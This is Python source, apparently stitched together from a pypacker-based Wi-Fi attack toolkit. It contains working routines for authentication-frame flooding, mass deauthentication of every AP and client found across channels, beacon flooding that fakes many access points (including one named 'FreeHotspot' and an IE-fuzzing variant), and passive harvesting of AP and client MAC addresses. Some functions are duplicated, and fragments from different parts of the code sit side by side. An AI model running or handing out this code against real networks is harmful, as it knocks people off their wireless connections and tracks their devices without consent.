def wifi_authdos_cb(pargs):
"""
Authentication frames DoS
"""
radiotap_ieee80211 = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0)
auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst)
radiotap_ieee80211_auth = radiotap_ieee80211 + auth
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
channel = int(pargs.channels.split(",")[0])
logger.debug("sending %d deauth to %r on channel %d", pargs.count,
pargs.mac_dst, channel)
utils.switch_wlan_channel(pargs.iface_name,
int(pargs.channels.split(",")[0]))
for cnt in range(pargs.count):
if cnt & 15 == 0:
print(".", end="")
sys.stdout.flush()
auth.src = pypacker.get_rnd_mac()
try:
psock_send.send(radiotap_ieee80211_auth.bin())
except socket.timeout:
# timeout on sending? that's ok
pass
print("")
psock_send.close()
def do_channel(self, arg):
try:
channel = int(arg)
logger.debug("setting channel to: %d" % channel)
utils.switch_wlan_channel(self._logic._packet_collector.iface,
channel)
except Exception as ex:
logger.warning("could not set channel: %r" % ex)
logger.warning("available channels: %r" % self._logic.channels)
def _harvest(self,
strategy,
harvest_time_per_channel_sec=10,
channels_to_scan=None):
"""
Harvest information about entities in the network (eg APs or clients)
using the callback represented by strategy.
This iterates ALL available channels as we don't know
where the entities operate at.
strategy -- callback with signature "strategy(packet) [True|False|None]", returns True
if channel-skip counter should be reset (remain on channel until next countdown exceeds)
return -- set(ap_mac | client_macs)
"""
self._packet_collector.start_collecting()
_channels_to_scan = self._channels if channels_to_scan is None else channels_to_scan
logger.debug("scanning channels: %r" % _channels_to_scan)
for channel in _channels_to_scan:
utils.switch_wlan_channel(self._packet_collector.iface, channel)
logger.info("! setting channel: %d" % channel)
time_start = time.time()
for bts in self._packet_collector:
reset_channel_countdown = False
try:
ratiotap_pkt = Radiotap(bts)
reset_channel_countdown = strategy(ratiotap_pkt, channel)
except Exception as e:
# something went wrong, parsing error?
logger.exception(e)
if reset_channel_countdown is True:
time_start = time.time()
elif time.time() - time_start > harvest_time_per_channel_sec:
break
self._packet_collector.stop_collecting()
def harvest(psock, mode, aps=None, known_clients=None, harvest_time_ch=5):
"""
harvest_time_ch -- time to harvest per channel in seconds
return -- set(ap_mac | client_macs)
"""
found = set()
for channel in channels:
utils.switch_wlan_channel(psock.iface_name, channel)
print("setting channel: %d" % channel)
time_start = time.time()
clients_seen = {}
cnt = 0
# TODO: to be tuned
while (time.time() - time_start) < harvest_time_ch:
try:
try:
raw_bytes = psock.recv()
except:
# assume timeout: switch channel
break
cnt += 1
drvinfo = radiotap.Radiotap(raw_bytes)
if cnt % 1000 == 0:
print("packets/s: %d" % (cnt / (time.time() - time_start)))
if mode == HARVEST_MODE_AP:
beacon = drvinfo[ieee80211.IEEE80211.Beacon]
if beacon is None:
continue
if beacon.bssid_s not in found:
logger.info("found AP: %18s %-40s %-10s" % (beacon.bssid_s,
utils.get_vendor_for_mac(beacon.bssid_s[0:8]),
beacon.params[0].data))
found.add(beacon.bssid_s)
elif mode == HARVEST_MODE_CLIENT:
dataframe = drvinfo[ieee80211.IEEE80211.Dataframe]
if dataframe is None:
continue
src = dataframe.src_s
if src in aps:
# not interested in aps
continue
if src not in found:
logger.info("found new client: %s" % src)
found.add(src)
elif mode == HARVEST_MODE_CLIENT_LIST:
try:
src = drvinfo[ieee80211.IEEE80211]._body_handler.src_s
if src in known_clients:
# TODO: signal strength
# print(src)
found.add(src)
except AttributeError as e:
pass
# print(e)
except Exception as e:
print(e)
for k in found:
# os.system("clear")
print("%s -> (%r)" % (k, str(known_clients[k])))
else:
print("wrong harvest mode")
return None
except Exception as e:
print(e)
return found
def do_colstart(self, _):
utils.switch_wlan_channel(self._logic._packet_collector.iface, 1)
self._logic._packet_collector.start_collecting()
def harvest(psock, mode, aps=None, known_clients=None, harvest_time_ch=5):
"""
harvest_time_ch -- time to harvest per channel in seconds
return -- set(ap_mac | client_macs)
"""
found = set()
for channel in channels:
utils.switch_wlan_channel(psock.iface_name, channel)
print("setting channel: %d" % channel)
time_start = time.time()
clients_seen = {}
cnt = 0
# TODO: to be tuned
while (time.time() - time_start) < harvest_time_ch:
try:
try:
raw_bytes = psock.recv()
except:
# assume timeout: switch channel
break
cnt += 1
drvinfo = radiotap.Radiotap(raw_bytes)
if cnt % 1000 == 0:
print("packets/s: %d" % (cnt / (time.time() - time_start)))
if mode == HARVEST_MODE_AP:
beacon = drvinfo[ieee80211.IEEE80211.Beacon]
if beacon is None:
continue
if beacon.bssid_s not in found:
logger.info(
"found AP: %18s %-40s %-10s" %
(beacon.bssid_s,
utils.get_vendor_for_mac(
beacon.bssid_s[0:8]), beacon.params[0].data))
found.add(beacon.bssid_s)
elif mode == HARVEST_MODE_CLIENT:
dataframe = drvinfo[ieee80211.IEEE80211.Dataframe]
if dataframe is None:
continue
src = dataframe.src_s
if src in aps:
# not interested in aps
continue
if src not in found:
logger.info("found new client: %s" % src)
found.add(src)
elif mode == HARVEST_MODE_CLIENT_LIST:
try:
src = drvinfo[ieee80211.IEEE80211]._body_handler.src_s
if src in known_clients:
# TODO: signal strength
# print(src)
found.add(src)
except AttributeError as e:
pass
# print(e)
except Exception as e:
print(e)
for k in found:
# os.system("clear")
print("%s -> (%r)" % (k, str(known_clients[k])))
else:
print("wrong harvest mode")
return None
except Exception as e:
print(e)
return found
def wifi_deauth_cb(pargs):
"""
Deauth everyone and everything
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
logger.debug("using channels: %r", channels)
psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2,
timeout=1)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
# {channel : {b"AP" : set(b"clients", ...)}}
wdata = collections.defaultdict(lambda: collections.defaultdict(set))
# thread: socket1: listen for traffic, extract ap/client macs
def listen_cycler(pargs_ref):
while pargs_ref.is_running:
try:
rtap = psock_rcv.recvp(lowest_layer=radiotap.Radiotap)[0]
except (IndexError, socket.timeout, OSError):
logger.debug("no packets received..")
continue
try:
pkt_ieee80211 = rtap.ieee80211
except Exception as ex:
logger.warning(ex)
# TODO: use channel info from radiotap?
if pkt_ieee80211.is_beacon():
bssid = pkt_ieee80211.beacon.bssid
if bssid in pargs.macs_excluded:
#logger.debug("excluding AP: %r", bssid)
continue
# don't overwrite already stored client MACs
if bssid not in wdata[pargs.current_channel]:
# logger.debug("new AP: %r %s", bssid, utils.get_vendor_for_mac(bssid))
wdata[pargs.current_channel][bssid] = set()
for client in pkt_ieee80211.extract_client_macs():
bssid = pkt_ieee80211.upper_layer.bssid
if bssid in pargs.macs_excluded:
#logger.debug("excluding AP: %r", bssid)
continue
if client in pargs.macs_excluded or\
client in wdata[pargs.current_channel][bssid]:
#logger.debug("excluding client: %r", bssid)
continue
# logger.debug("new client: %r %s", client, utils.get_vendor_for_mac(client))
wdata[pargs.current_channel][bssid].add(client)
pargs.is_running = True
pargs.current_channel = channels[0]
layer_radiotap = radiotap.Radiotap()
layer_iee80211 = ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE,
subtype=ieee80211.M_DEAUTH)
layer_deauth = ieee80211.IEEE80211.Deauth()
pkt_deauth = layer_radiotap + layer_iee80211 + layer_deauth
thread_listen = threading.Thread(target=listen_cycler, args=[pargs])
thread_listen.start()
logger.info("first round slow start..")
for cnt in range(pargs.count):
seq = 0
layer_deauth.seq = seq
if not pargs.is_running:
break
for channel in channels:
# skip non-traffic channels
if cnt > 0 and len(wdata[channel]) == 0:
#logger.debug("skipping channel %d", channel)
continue
utils.switch_wlan_channel(pargs.iface_name, channel)
pargs.current_channel = channel
try:
time.sleep(0.4 if cnt == 0 else 0.05)
except KeyboardInterrupt:
pargs.is_running = False
break
logger.info(
"deauth on channel %3d (%3d APs, %3d clients, round %4d)",
channel, len(wdata[channel]),
sum(len(clients) for ap, clients in wdata[channel].items()),
cnt)
# TODO: quite slow
aps = list(wdata[channel].keys())
for mac_ap, macs_clients in [[ap, wdata[channel][ap]]
for ap in aps]:
layer_deauth.seq += 1
layer_deauth.src = mac_ap
layer_deauth.bssid = mac_ap
if not pargs.nobroadcast:
# reset src/dst for broadcast
layer_deauth.dst = b"\xFF" * 6
# TODO: increase?
# logger.debug("deauth AP: %r", mac_ap)
for _ in range(5):
layer_deauth.seq += 1
psock_send.send(pkt_deauth.bin())
for mac_client in list(macs_clients):
# logger.debug("deauth client: %r", mac_client)
layer_deauth.dst = mac_client
for _ in range(2):
layer_deauth.seq += 1
psock_send.send(pkt_deauth.bin())
psock_send.close()
psock_rcv.close()
def wifi_ap_ie_cb(pargs):
"""
Create fake APs using various IEs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
]
)
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "012"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
ie_cnt = 0
pkt_cnt = 0
PACKETS_PER_CHANNEL = 3
for _ in range(pargs.count):
if not pargs.is_running:
break
for channel in channels:
if pkt_cnt % (256) == 0:
print("%d packets sent, ch: %d \r" % (pkt_cnt, channel),
end="")
sys.stdout.flush()
_beacon.params[2].body_bytes = pack_B(channel)
utils.switch_wlan_channel(pargs.iface_name, channel)
#logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
pkt_cnt += 256
try:
for ie_id in range(256):
_beacon.params[5].id = ie_id
mac = pypacker.get_rnd_mac()
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = get_random_essid()
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
for _ in range(PACKETS_PER_CHANNEL):
_beacon.seq = ie_id
# _beacon.ts = x << (8*7)
_beacon.ts = ie_id * 20
# time.sleep(0.01)
psock_send.send(beacon.bin())
time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning(
"buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
ie_cnt = (ie_cnt + 1) & 0xFF
psock_send.close()
def wifi_ap_cb(pargs):
"""
Create a massive amount of fake APs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "FreeHotspot"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
_beacon.interval = 0xFFFF
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
rand_mac = True
rand_essid = True
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
cnt = 0
rounds = 0
PACKETS_PER_CHANNEL = 3
starttime = time.time()
_beacon.params[2].body_bytes = pack_B(channels[0])
utils.switch_wlan_channel(pargs.iface_name, channels[0])
for _ in range(pargs.count):
if not pargs.is_running:
break
if cnt & 0xF == 0:
print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
sys.stdout.flush()
if time.time() - starttime > 60:
rounds += 1
cnt = 0
cnt_bts = unpack_I(cnt)[0][-3:]
cnt += 1
if rand_mac:
mac = pypacker.get_rnd_mac()[:3] + cnt_bts
_beacon.src = mac
_beacon.bssid = mac
if rand_essid:
_beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
try:
_beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
_beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL
for cnt_ap in range(PACKETS_PER_CHANNEL):
# send multiple beacons for every ap
psock_send.send(beacon.bin())
_beacon.seq += 1
_beacon.ts += 0x100
#time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning("buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
psock_send.close()
